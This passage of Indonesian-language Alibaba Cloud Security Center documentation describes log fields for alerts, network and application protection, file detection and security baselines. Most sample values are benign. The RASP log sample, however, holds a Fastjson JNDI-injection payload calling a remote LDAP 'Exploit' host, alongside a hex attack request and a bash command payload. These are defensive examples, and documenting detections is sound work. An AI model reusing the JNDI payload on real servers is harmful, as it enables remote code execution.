  • aegis_login_log: login tidak biasa

  • honeypot: peristiwa peringatan yang dihasilkan oleh honeypot cloud

  • object_scan: pengecualian deteksi file

  • security_event: pengecualian Pusat Keamanan

  • sas_ak_leak: kebocoran pasangan AccessKey

aegis_login_log

detail

Detail peringatan.

Catatan

Nilai field detail dalam log bervariasi berdasarkan jenis peringatan. Jika Anda memiliki pertanyaan tentang parameter dalam field detail saat melihat log peringatan, Anda dapat mengirimkan tiket untuk menghubungi dukungan teknis.

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Logon ke instance ECS menggunakan akun tidak biasa","status":0}

instance_id

ID instance.

i-2zeg4zldn8zypsfg****

internet_ip

Alamat IP publik host.

39.104.XX.XX

intranet_ip

Alamat IP privat host.

192.168.XX.XX

level

Tingkat risiko peringatan. Nilai valid:

  • serious

  • suspicious

  • remind

suspicious

name

Nama peringatan.

Login Tidak Biasa - Masuk ke instance ECS menggunakan akun tidak biasa

operation

Operasi. Nilai valid:

  • new

  • dealing

  • update

new

status

Informasi status. Nilai valid:

  • 0: semua

  • 1: menunggu penanganan

  • 2: diabaikan

  • 4: dikonfirmasi

  • 8: ditandai sebagai positif palsu

  • 16: sedang ditangani

  • 32: sudah ditangani

  • 64: kedaluwarsa

  • 128: dihapus

  • 512: sedang diblokir secara otomatis

  • 513: telah diblokir secara otomatis

1

informasi_unik

UUID peringatan.

2536dd765f804916a1fa3b9516b5****

uuid

UUID server tempat peringatan dihasilkan.

ad66133a-dc82-4e5e-9659-a49e3****

start_time

Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik.

1719472214

CSPM - Log pemeriksaan konfigurasi platform cloud

Nama field

Deskripsi

Contoh

check_id

ID item pemeriksaan. Anda dapat memanggil operasi ListCheckResult untuk menanyakan ID item pemeriksaan. Operasi ini digunakan untuk menanyakan detail item risiko yang terdeteksi dalam pemeriksaan konfigurasi layanan cloud.

11

check_item_name

Nama item pemeriksaan.

Pengaturan kembali ke asal

instance_id

ID instance.

i-2zeg4zldn8zypsfg****

instance_name

Nama instance.

lsm

instance_result

Dampak risiko. Nilainya adalah string JSON.

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Nama Instance","type":"text"}]}

instance_sub_type

Subtipe instance. Nilai valid:

  • Jika tipe instance adalah ECS, nilai valid berikut didukung:

    • INSTANCE

    • DISK

    • SECURITY_GROUP

  • Jika tipe instance adalah Container Registry, nilai valid berikut didukung:

    • REPOSITORY_ENTERPRISE

    • REPOSITORY_PERSON

  • Jika tipe instance adalah Resource Access Management (RAM), nilai valid berikut didukung:

    • ALIAS

    • USER

    • POLICY

    • GROUP

  • Jika tipe instance adalah Web Application Firewall (WAF), nilainya tetap sebagai DOMAIN.

  • Jika tipe instance adalah nilai lainnya, nilainya tetap sebagai INSTANCE.

INSTANCE

instance_type

Tipe instance. Nilai valid:

  • ECS

  • SLB

  • RDS: ApsaraDB RDS

  • MONGODB: ApsaraDB for MongoDB

  • KVSTORE: ApsaraDB for Redis

  • ACR: Container Registry

  • CSK: Container Service for Kubernetes (ACK)

  • VPC: Virtual Private Cloud (VPC)

  • ACTIONTRAIL: ActionTrail

  • CDN: Alibaba Cloud CDN (CDN)

  • CAS: Certificate Management Service (sebelumnya SSL Certificates Service)

  • RDC: Apsara Devops

  • RAM

  • DDOS: Anti-DDoS Proxy

  • WAF

  • OSS

  • POLARDB: PolarDB

  • POSTGRESQL: ApsaraDB RDS for PostgreSQL

  • MSE: Microservices Engine (MSE)

  • NAS: File Storage NAS (NAS)

  • SDDP: Sensitive Data Discovery and Protection (SDDP)

  • EIP: Elastic IP Address (EIP)

ECS

region_id

ID wilayah instance.

cn-hangzhou

requirement_id

ID item persyaratan. Anda dapat memanggil operasi ListCheckStandard untuk menanyakan ID item persyaratan. Operasi ini digunakan untuk menanyakan standar pemeriksaan konfigurasi.

5

risk_level

Tingkat risiko. Nilai valid:

  • LOW

  • MEDIUM

  • HIGH

MEDIUM

section_id

ID bagian. Anda dapat memanggil operasi ListCheckResult untuk menanyakan ID bagian.

1

standard_id

ID standar. Anda dapat memanggil operasi ListCheckStandard untuk menanyakan ID standar.

1

status

Status item pemeriksaan. Nilai valid:

  • NOT_CHECK: Item pemeriksaan belum diperiksa.

  • CHECKING: Item pemeriksaan sedang diperiksa.

  • PASS: Item pemeriksaan lulus pemeriksaan.

  • NOT_PASS: Item pemeriksaan gagal pemeriksaan.

  • WHITELIST: Item pemeriksaan ditambahkan ke daftar putih.

PASS

vendor

Penyedia layanan cloud. Nilainya tetap sebagai ALIYUN.

ALIYUN

start_time

Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik.

1719472214

Log pertahanan jaringan

Nama field

Deskripsi

Contoh

cmd

Baris perintah proses yang diserang.

nginx: master process nginx

cur_time

Waktu terjadinya peristiwa serangan.

2023-09-14 09:21:59

decode_payload

Payload heksadesimal yang didekode.

POST /Services/FileService/UserFiles/

dst_ip

Alamat IP aset yang diserang.

172.16.XX.XX

dst_port

Port dari aset yang diserang.

80

fungsi

Jenis peristiwa yang diblokir. Nilai valid:

  • payload: menunjukkan bahwa suatu peristiwa diblokir saat data atau instruksi berbahaya terdeteksi.

  • tuple: menunjukkan bahwa suatu peristiwa diblokir saat alamat IP berbahaya terdeteksi.

payload

rule_type

Tipe aturan yang digunakan dalam peristiwa yang diblokir. Nilai valid:

  • alinet_payload: aturan pertahanan payload yang ditentukan di Pusat Keamanan.

  • alinet_tuple: aturan pertahanan tuple yang ditentukan di Pusat Keamanan.

alinet_payload

instance_id

ID instance dari aset yang diserang.

i-2zeg4zldn8zypsfg****

internet_ip

Alamat IP publik dari aset yang diserang.

39.104.XX.XX

intranet_ip

Alamat IP pribadi dari aset yang diserang.

192.168.XX.XX

final_action

Tindakan pertahanan. Nilai ini tetap sebagai block. Nilai tersebut menunjukkan bahwa serangan telah diblokir.

block

payload

Payload heksadesimal.

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

ID proses yang diserang.

7107

platform

Tipe sistem operasi.

  • windows

  • linux

linux

proc_path

Jalur menuju proses yang diserang.

/usr/sbin/nginx

sas_group_name

Grup aset tempat server tersebut berada di Security Center.

default

src_ip

Alamat IP sumber dari serangan.

106.11.XX.XX

src_port

Port sumber dari serangan.

29.575

uuid

UUID server.

5d83b26b-b7ca-4a0a-9267-12****

waktu_mulai

Stempel waktu awal, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik.

1.719.472.214

Log perlindungan aplikasi

Nama bidang

Deskripsi

Contoh

app_dir

Direktori tempat aplikasi disimpan.

/usr/local/aegis/rasp/apps/1111

app_id

ID aplikasi.

6492a391fc9b4e2aad94****

app_name

Nama aplikasi.

test

confidence_level

Tingkat kepercayaan algoritma deteksi. Nilai yang valid:

  • tinggi

  • sedang

  • rendah

rendah

request_body

Informasi tentang badan permintaan.

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

Panjang badan permintaan.

112

data

Panggilan balik.

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

Informasi tentang header permintaan.

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"}

hostname

Nama host atau perangkat jaringan.

testhostname

host_ip

Alamat IP privat host.

172.16.XX.XX

is_cliped

Menunjukkan apakah log dipotong karena panjang berlebih. Nilai yang valid:

  • true

  • false

false

jdk_version

Versi JDK.

1.8.0_292

message

Deskripsi peringatan.

Kelas tidak aman serial.

request_method

Metode permintaan.

Post

platform

Jenis sistem operasi.

Linux

arch

Arsitektur sistem operasi.

amd64

kernel_version

Versi kernel sistem operasi.

3.10.0-1160.59.1.el7.x86_64

param

Parameter permintaan. Dalam banyak kasus, parameter dalam salah satu format berikut:

  • Parameter GET

  • application/x-www-form-urlencoded

{"url":["http://127.0.0.1.xip.io"]}

payload

Payload serangan.

bash -c kill -0 -- -'31098'

payload_length

Panjang payload serangan.

27

rasp_id

ID agen Runtime Application Self Protection (RASP).

fa00223c8420e256c0c98ca0bd0d****

rasp_version

Versi agen RASP.

0.8.5

src_ip

Alamat IP dari mana permintaan diinisiasi.

172.0.XX.XX

final_action

Hasil penanganan peringatan. Nilai yang valid:

  • block

  • monitor

block

rule_action

Tindakan penanganan peringatan yang ditentukan dalam aturan perlindungan aplikasi. Nilai yang valid:

  • block

  • monitor

block

risk_level

Tingkat risiko. Nilai yang valid:

  • high

  • medium

  • low

high

stacktrace

Informasi stack.

[java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......]

time

Waktu ketika peringatan dibuat.

2023-10-09 15:19:15

timestamp

Timestamp ketika peringatan dibuat. Satuan: milidetik.

1696835955070

type

Jenis serangan. Nilai yang valid:

  • attach: API Attach berbahaya

  • beans: pengikatan beans berbahaya

  • classloader: pemuatan kelas berbahaya

  • dangerous_protocol: penggunaan protokol rentan

  • dns: Kueri DNS berbahaya

  • engine: injeksi engine

  • expression: injeksi ekspresi

  • file: operasi pembacaan dan penulisan file jahat

  • file_delete: penghapusan file sembarang

  • file_list: penelusuran direktori

  • file_read: pembacaan file sembarang

  • file_upload: unggahan file berbahaya

  • jndi: Java Naming and Directory Interface (JNDI) injection

  • jni: Java Native Interface (JNI) injection

  • jstl: JavaServer Pages Standard Tag Library (JSTL) arbitrary file inclusion

  • memory_shell: in-memory webshell injection

  • rce: eksekusi perintah

  • read_object: serangan deserialisasi

  • reflect: panggilan refleksi berbahaya

  • sql: SQL injection

  • ssrf: koneksi eksternal berbahaya

  • thread_inject: injeksi thread

  • xxe: XML external entity (XXE) attack

rce

url

URL permintaan.

http://127.0.0.1:999/xxx

rasp_attack_uuid

UUID serangan.

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

UUID host.

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

Alamat IP publik host.

1.2.XX.XX

intranet_ip

Alamat IP privat host.

172.16.XX.XX

sas_group_name

Grup tempat server termasuk dalam Security Center.

Group 1

instance_id

ID instance host.

i-wz995eivg28f1m**

start_time

Timestamp awal, menunjukkan waktu terjadinya peristiwa. Satuan: detik.

1719472214

Log deteksi file jahat

Nama bidang

Deskripsi

Contoh

bucket_name

Nama Bucket OSS.

***-test

event_id

ID dari peringatan.

802210

event_name

Nama dari peringatan.

Program penambangan

md5

Nilai hash MD5 dari file.

6bc2bc******53d409b1

sha256

Nilai hash SHA-256 dari file.

f038f9525******7772981e87f85

result

Hasil deteksi. Nilai yang valid:

  • 0: Tidak ada file jahat yang terdeteksi.

  • 1: File jahat terdeteksi.

0

file_path

Path ke file.

test.zip/bin_test

etag

ID objek OSS.

6BC2B******853D409B1

risk_level

Tingkat risiko. Nilai yang valid:

  • serius

  • mencurigakan

  • peringatan

Mengingatkan

source

Metode pemeriksaan. Nilai yang valid:

  • OSS: Objek dalam Bucket OSS diperiksa di konsol Security Center.

  • API: SDK untuk Java atau Python digunakan untuk mendeteksi file jahat.

OSS

parent_md5

Nilai hash MD5 dari file induk atau file paket terkompresi.

3d0f8045bb9******

parent_sha256

Nilai hash SHA-256 dari file induk atau file paket terkompresi.

69b643d6******a3fb859fa

parent_file_path

Nama file induk atau file paket terkompresi.

test.zip

start_time

Timestamp awal, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik.

1719472214

Log pemantauan inti file

Nama field

Deskripsi

Contoh

start_time

Timestamp terakhir ketika peristiwa terjadi. Satuan: detik.

1718678414

uuid

UUID server.

5d83b26b-b**a-4**a-9267-12****

file_path

Path menuju file.

/etc/passwd

proc_path

Path proses.

/usr/bin/bash

rule_id

ID aturan yang terpicu.

123

nama_aturan

Nama aturan.

aturan_uji_file

cmdline

Baris perintah.

bash /opt/a

operation

Operasi yang ingin Anda lakukan pada file.

READ

risk_level

Tingkat risiko.

2

pid

ID proses.

45324

proc_permission

Izin untuk menjalankan proses.

rwxrwxrwx

instance_id

ID instance.

i-wz995eivg2****

internet_ip

Alamat IP publik.

192.0.2.1

intranet_ip

Alamat IP privat.

172.16.0.1

instance_name

Nama instance.

aegis-test

platform

Tipe sistem operasi.

Linux

Log deteksi tanpa agen

Field umum untuk kerentanan, baseline, dan sampel berbahaya

Nama field

Deskripsi

Contoh

uuid

UUID server.

ad66133a-dc82-4e5e-9659-a49e3****

instance_id

ID instance.

i-2zeg4zldn8zypsfg****

internet_ip

Alamat IP publik aset.

39.104.XX.XX

intranet_ip

Alamat IP privat aset.

192.168.XX.XX

sas_group_name

Grup aset tempat server berada di Pusat Keamanan.

default

start_time

Timestamp awal dalam detik, juga digunakan untuk menunjukkan waktu terjadinya peristiwa.

1719472214

Field risiko kerentanan

Nama field

Deskripsi

Contoh

vul_name

Nama kerentanan.

imgsca:java:gson:AVD-2022-25647

vul_alias_name

Alias kerentanan.

masalah kode gson (CVE-2022-25647)

vul_primary_id

ID utama bisnis kerentanan.

990174361

type

Jenis kerentanan. Nilai valid:

  • sys: Kerentanan sistem Windows.

  • cve: Kerentanan perangkat lunak Linux.

  • sca: Kerentanan aplikasi (jenis parsing konstituen perangkat lunak).

  • emg: Kerentanan darurat.

sca

alert_level

Tingkat risiko algoritma deteksi. Nilai valid:

  • asap: Tinggi

  • later: Sedang

  • nntf: Rendah

asap

instance_name

Nama host.

hhht-linux-***

operation

Aksi penanganan kerentanan. Nilai valid:

  • new: Baru

  • update: Perbarui

new

status

Informasi status kerentanan. Nilai valid:

  • 1: Belum diperbaiki

  • 7: Sudah diperbaiki

1

tag

Tag kerentanan. Nilai valid:

  • oval: Kerentanan perangkat lunak Linux.

  • system: Kerentanan sistem Windows.

Catatan

Tag untuk jenis kerentanan lainnya adalah string acak.

oval

Field pemeriksaan baseline

Nama field

Deskripsi

Contoh

check_item_name

Nama item pemeriksaan.

Setel waktu kedaluwarsa kata sandi

check_item_level

Tingkat risiko item pemeriksaan. Nilai valid:

  • high: Penting

  • medium: Medium

  • low: Rendah

high

check_type

Jenis item pemeriksaan.

Otentikasi identitas

risk_level

Tingkat risiko item. Nilai valid:

  • high: Penting

  • medium: Medium

  • low: Rendah

low

operation

Informasi operasi. Nilai valid:

  • new: Baru.

  • update: Perbarui.

new

risk_name

Nama item pemeriksaan dengan risiko.

Pemeriksaan kepatuhan kata sandi

status

Informasi status item pemeriksaan. Nilai valid:

  • 1: Gagal

  • 3: Lulus

1

sub_type_alias_name

Alias subtipe (Cina).

Standar Alibaba Cloud - Baseline Keamanan CentOS Linux 7/8

sub_type_name

Nama subtipe baseline. Untuk nilai subtipe baseline, lihat Jenis dan subtipe baseline.

hc_centos7

type_name

Nama tipe.

hc_best_secruity

type_alias_name

Alias tipe (Cina).

Praktik keamanan terbaik

container_id

ID kontainer.

b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86****

container_name

Nama kontainer.

k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0

Field sampel berbahaya

Nama field

Deskripsi

Contoh

alert_level

Tingkat risiko peristiwa peringatan. Nilai valid:

  • serious: Kritis.

  • suspicious: Mencurigakan.

  • remind: Pengingat.

suspicious

alert_name

Nama peringatan sampel berbahaya.

Proses mencurigakan - Berbasis SSH

operation

Informasi operasi. Nilai valid:

  • new: Baru.

  • update: Perbarui.

new

status

Informasi status risiko sampel berbahaya. Nilai valid:

  • 0: Belum diproses

  • 3: Dalam daftar putih

0

suspicious_event_id

ID peristiwa peringatan.

909361

Field file sensitif

Nama field

Deskripsi

Contoh

alert_level

Tingkat risiko. Nilai valid:

  • high: Penting

  • medium: Sedang

  • low: Rendah

high

rule_name

Nama tipe file.

ionic token

file_path

Path file sensitif.

/Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll

result

Hasil pemeriksaan.

{"result":"[\"[\\\"mysql-uqjtwadmin-xxx"}

Lampiran

Jenis dan subtipe baseline

Tipe

Subtipe

Deskripsi

hc_exploit

hc_exploit_redis

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Redis yang tinggi

hc_exploit_activemq

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah ActiveMQ yang tinggi

hc_exploit_couchdb

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah CouchDB yang tinggi

hc_exploit_docker

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Docker yang tinggi

hc_exploit_es

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Elasticsearch yang tinggi

hc_exploit_hadoop

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Hadoop yang tinggi

hc_exploit_jboss

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Jboss yang tinggi

hc_exploit_jenkins

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Jenkins yang tinggi

hc_exploit_k8s_api

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Kubernetes Apiserver yang tinggi

hc_exploit_ldap

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah LDAP (Windows)

hc_exploit_ldap_linux

Baseline kerentanan akses tidak sah OpenLDAP (Linux)

hc_exploit_memcache

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Memcached yang tinggi

hc_exploit_mongo

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Mongodb yang tinggi

hc_exploit_pgsql

Baseline risiko tinggi untuk akses tidak sah ke Postgresql

hc_exploit_rabbitmq

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah RabbitMQ yang tinggi

hc_exploit_rsync

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah rsync yang tinggi

hc_exploit_tomcat

Vulnerabilitas File Read/Inclusion Apache Tomcat AJP

hc_exploit_zookeeper

Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah ZooKeeper yang tinggi

hc_container

hc_docker

Pemeriksaan Baseline Keamanan Standar Alibaba Cloud - Docker

hc_middleware_ack_master

Praktik Terbaik Internasional untuk Keamanan Master Kubernetes (ACK)

hc_middleware_ack_node

Praktik Terbaik Internasional untuk Keamanan Node Kubernetes (ACK)

hc_middleware_k8s

Pemeriksaan Baseline Keamanan Master-Kubernetes-Alibaba Cloud Standard

hc_middleware_k8s_node

Pemeriksaan Baseline Keamanan Node-Kubernetes-Alibaba Cloud Standard

cis

hc_suse 15_djbh

Baseline SUSE Linux 15 untuk Perlindungan Siber Tingkat III di China

hc_aliyun_linux3_djbh_l3

Baseline Alibaba Cloud Linux 3 untuk Perlindungan Siber Tingkat III di China

hc_aliyun_linux_djbh_l3

Baseline Alibaba Cloud Linux/Aliyun Linux 2 untuk Perlindungan Siber Tingkat III di China

hc_bind_djbh

Pemeriksaan Baseline Kepatuhan Bind Tingkat III Perlindungan Siber di China

hc_centos 6_djbh_l3

Baseline CentOS Linux 6 untuk Perlindungan Siber Tingkat III di China

hc_centos 7_djbh_l3

Baseline CentOS Linux 7 untuk Perlindungan Siber Tingkat III di China

hc_centos 8_djbh_l3

Baseline CentOS Linux 8 untuk Perlindungan Siber Tingkat III di China

hc_debian_djbh_l3

Baseline Debian Linux 8/9/10 untuk Perlindungan Siber Tingkat III di China

hc_iis_djbh

Baseline IIS untuk Perlindungan Siber Tingkat III di China

hc_informix_djbh

Pemeriksaan Baseline Kepatuhan Informix Tingkat III Perlindungan Siber di China

hc_jboss_djbh

Pemeriksaan Baseline Kepatuhan Jboss6/7 Tingkat III Perlindungan Siber di China

hc_mongo_djbh

Baseline MongoDB untuk Perlindungan Siber Tingkat III di China

hc_mssql_djbh

Pemeriksaan Baseline Kepatuhan SQL Server Tingkat III Perlindungan Siber di China

hc_mysql_djbh

Pemeriksaan Baseline Kepatuhan MySQL Tingkat Jaminan Setara 3

hc_nginx_djbh

Pemeriksaan Baseline Kepatuhan Nginx Tingkat III Perlindungan Siber di China

hc_oracle_djbh

Pemeriksaan Baseline Kepatuhan Oracle Tingkat III Perlindungan Siber di China

hc_pgsql_djbh

Pemeriksaan Baseline Kepatuhan PostgreSql Tingkat III

hc_redhat 6_djbh_l3

Pemeriksaan Baseline Kepatuhan Red Hat Enterprise Linux 6 Tingkat III Perlindungan Siber di China

hc_redhat_djbh_l3

Pemeriksaan Baseline Kepatuhan Red Hat Enterprise Linux 7 Tingkat III Perlindungan Siber di China

hc_redis_djbh

Baseline Redis untuk Perlindungan Siber Tingkat III di China

hc_suse 10_djbh_l3

Baseline SUSE Linux 10 untuk Perlindungan Siber Tingkat III di China

hc_suse 12_djbh_l3

Baseline SUSE Linux 12 untuk Perlindungan Siber Tingkat III di China

hc_suse_djbh_l3

Baseline SUSE Linux 11 untuk Perlindungan Siber Tingkat III di China

hc_ubuntu 14_djbh_l3

Baseline Ubuntu 14 untuk Perlindungan Siber Tingkat III di China

hc_ubuntu_djbh_l3

Menunggu Inspeksi Peraturan Kepatuhan Tingkat III-Ubuntu 16/18/20

hc_was_djbh

Pemeriksaan Baseline Kepatuhan Websphere Application Server Tingkat III Perlindungan Siber di China

hc_weblogic_djbh

Baseline Weblogic untuk Perlindungan Siber Tingkat III di China

hc_win 2008_djbh_l3

Pemeriksaan Baseline Kepatuhan Windows Server 2008 R2 Tingkat III Perlindungan Siber di China

hc_win 2012_djbh_l3

Baseline Windows 2012 R2 untuk Perlindungan Siber Tingkat III di China

hc_win 2016_djbh_l3

Baseline Windows 2016/2019 untuk Perlindungan Siber Tingkat III di China

hc_aliyun_linux_djbh_l2

Baseline Alibaba Cloud Linux/Aliyun Linux 2 untuk Perlindungan Siber Tingkat II di China

hc_centos 6_djbh_l2

Baseline CentOS Linux 6 untuk Perlindungan Siber Tingkat II di China

hc_centos 7_djbh_l2

Baseline CentOS Linux 7 untuk Perlindungan Siber Tingkat II di China

hc_debian_djbh_l2

Debian Linux 8 Baseline untuk Perlindungan Terklasifikasi Tiongkok terhadap Keamanan Siber-Tingkat II

hc_redhat 7_djbh_l2

Redhat Linux 7 Baseline untuk Perlindungan Siber Tersier Tingkat II di China

hc_ubuntu_djbh_l2

Baseline Ubuntu Linux 16/18 untuk Perlindungan Siber Tingkat II di China

hc_win 2008_djbh_l2

Baseline Windows Server 2008 R2 untuk Perlindungan Siber Tingkat II di China

hc_win 2012_djbh_l2

Baseline Windows Server 2012 R2 untuk Perlindungan Siber Tingkat II di China

hc_win 2016_djbh_l2

Baseline Windows Server 2016/2019 untuk Perlindungan Siber Tingkat II di China

hc_aliyun_linux_cis

Praktik Terbaik Internasional untuk Keamanan Alibaba Cloud Linux 2

hc_centos 6_cis_rules

Praktik Terbaik Internasional untuk Keamanan CentOS Linux 6 LTS

hc_centos 7_cis_rules

Praktik Terbaik Internasional untuk Keamanan CentOS Linux 7 LTS

hc_centos 8_cis_rules

Praktik Terbaik Internasional untuk Keamanan CentOS Linux 8 LTS

hc_debian 8_cis_rules

Praktik Terbaik Internasional untuk Keamanan Debian Linux 8

hc_ubuntu 14_cis_rules

Praktik Terbaik Internasional untuk Keamanan Ubuntu 14 LTS

hc_ubuntu 16_cis_rules

Praktik Terbaik Internasional untuk Keamanan Ubuntu 16/18/20 LTS

hc_win 2008_cis_rules

Praktik Terbaik Internasional untuk Keamanan Windows Server 2008 R2

hc_win 2012_cis_rules

Praktik Terbaik Internasional untuk Keamanan Windows Server 2012 R2

hc_win 2016_cis_rules

Praktik Terbaik Internasional untuk Keamanan Windows Server 2016/2019 R2

hc_kylin_djbh_l3

Pemeriksaan Baseline Kepatuhan Kylin Tingkat III Perlindungan Siber di China

hc_uos_djbh_l3

Pemeriksaan Baseline Kepatuhan uos Tingkat III Perlindungan Siber di China

hc_best_security

hc_aliyun_linux

Benchmark Keamanan Alibaba Cloud Linux/Aliyun Linux 2

hc_centos 6

Pemeriksaan Baseline Keamanan Standar Alibaba Cloud - CentOS Linux 6

hc_centos 7

Pemeriksaan Baseline Keamanan Standar Alibaba Cloud - CentOS Linux 7/8

hc_debian

Baseline Keamanan Standar Alibaba Cloud - Debian Linux 8/9/10

hc_redhat 6

Pemeriksaan Baseline Keamanan Standar Alibaba Cloud - Red Hat Enterprise Linux 6

hc_redhat 7

Pemeriksaan Baseline Keamanan Standar Alibaba Cloud - Red Hat Enterprise Linux 7/8

hc_ubuntu

Baseline Keamanan Standar Alibaba Cloud - Ubuntu

hc_windows_2008

Pemeriksaan Baseline Keamanan Standar Alibaba Cloud - Windows Server 2008 R2

hc_windows_2012

Baseline Keamanan Standar Alibaba Cloud - Windows 2012 R2

hc_windows_2016

Baseline Keamanan Standar Alibaba Cloud - Windows 2016/2019

hc_db_mssql

Pemeriksaan Baseline Keamanan SQL Server Standar Alibaba Cloud

hc_memcached_ali

Pemeriksaan Baseline Keamanan Memcached Standar Alibaba Cloud

hc_mongodb

Pemeriksaan Baseline Keamanan MongoDB versi 3.x Standar Alibaba Cloud

hc_mysql_ali

Pemeriksaan Baseline Keamanan Mysql Standar Alibaba Cloud

hc_oracle

Pemeriksaan Baseline Keamanan Oracle 11g Standar Alibaba Cloud

hc_pgsql_ali

Pemeriksaan Inisialisasi Keamanan PostgreSql Standar Alibaba Cloud

hc_redis_ali

Pemeriksaan Baseline Keamanan Redis Standar Alibaba Cloud

hc_apache

Pemeriksaan Baseline Keamanan Apache Standar Alibaba Cloud

hc_iis_8

Pemeriksaan Baseline Keamanan IIS 8 Standar Alibaba Cloud

hc_nginx_linux

Pemeriksaan Baseline Keamanan Nginx Standar Alibaba Cloud

hc_suse 15

Pemeriksaan Baseline Keamanan SUSE Linux 15 Standar Alibaba Cloud

tomcat 7

Baseline Keamanan Apache Tomcat Standar Alibaba Cloud

weak_password

hc_mongodb_pwd

Kata Sandi Lemah - Baseline Kata Sandi Lemah MongoDB (versi 2.X)

hc_weakpwd_ftp_linux

Kata Sandi Lemah - Baseline kata sandi lemah login Ftp

hc_weakpwd_linux_sys

Kata Sandi Lemah - Baseline kata sandi lemah login sistem Linux

hc_weakpwd_mongodb 3

Kata Sandi Lemah - Baseline Kata Sandi Lemah MongoDB

hc_weakpwd_mssql

Kata Sandi Lemah - Baseline kata sandi lemah login DB SQL Server

hc_weakpwd_mysql_linux

Kata Sandi Lemah - Baseline kata sandi lemah login DB Mysql

hc_weakpwd_mysql_win

Kata Sandi Lemah - Baseline kata sandi lemah login DB Mysql (versi Windows)

hc_weakpwd_openldap

Kata Sandi Lemah - Baseline kata sandi lemah login Openldap

hc_weakpwd_oracle

Pendeteksian Kata Sandi Lemah Login Oracle

hc_weakpwd_pgsql

Kata Sandi Lemah - Baseline kata sandi lemah login DB PostgreSQL

hc_weakpwd_pptp

Kata Sandi Lemah - Baseline kata sandi lemah login pptpd

hc_weakpwd_redis_linux

Kata Sandi Lemah - Baseline kata sandi lemah login DB Redis

hc_weakpwd_rsync

Kata Sandi Lemah - Baseline kata sandi lemah login rsync

hc_weakpwd_svn

Kata Sandi Lemah - Baseline kata sandi lemah login svn

hc_weakpwd_tomcat_linux

Baseline kata sandi lemah Konsol Apache Tomcat

hc_weakpwd_vnc

Pemeriksaan Kata Sandi Lemah VncServer

hc_weakpwd_weblogic

Kata Sandi Lemah - Pendeteksian Kata Sandi Lemah Login Weblogic 12c

hc_weakpwd_win_sys

Kata Sandi Lemah - Baseline kata sandi lemah login sistem Windows

Field Log Jaringan

Log Akses Web

Nama Field

Deskripsi

Contoh

response_content_length

Panjang badan pesan. Satuan: byte.

612

dst_ip

Alamat IP tujuan.

39.105.XX.XX

dst_port

Port tujuan.

80

host

Alamat IP atau nama domain dari host tujuan.

39.105.XX.XX

jump_location

Alamat pengalihan.

123

request_method

Metode permintaan HTTP.

GET

http_referer

Referensi HTTP. Field ini berisi URL halaman web yang terhubung ke sumber daya yang diminta.

www.example.com

request_datetime

Waktu permintaan dimulai.

2024-08-01 06:59:28

status

Kode status HTTP.

200

content_type

Tipe konten permintaan.

text/plain;charset=utf-8

response_content_type

Tipe konten respons.

text/plain; charset=utf-8

src_ip

Alamat IP sumber.

31.220.XX.XX

src_port

Port sumber.

59524

request_uri

URI permintaan.

/report

http_user_agent

Agen pengguna yang memulai permintaan.

okhttp/3.2.0

http_x_forward_for

Header permintaan HTTP yang mencatat alamat IP asal klien.

31.220.XX.XX

Log DNS

Nama Field

Deskripsi

Contoh

additional

Field tambahan yang dikembalikan oleh server DNS dan mencatat informasi seperti rekaman CNAME, rekaman MX, dan rekaman PTR.

N/A

additional_num

Jumlah rekaman tambahan yang dikembalikan oleh server DNS.

0

answer

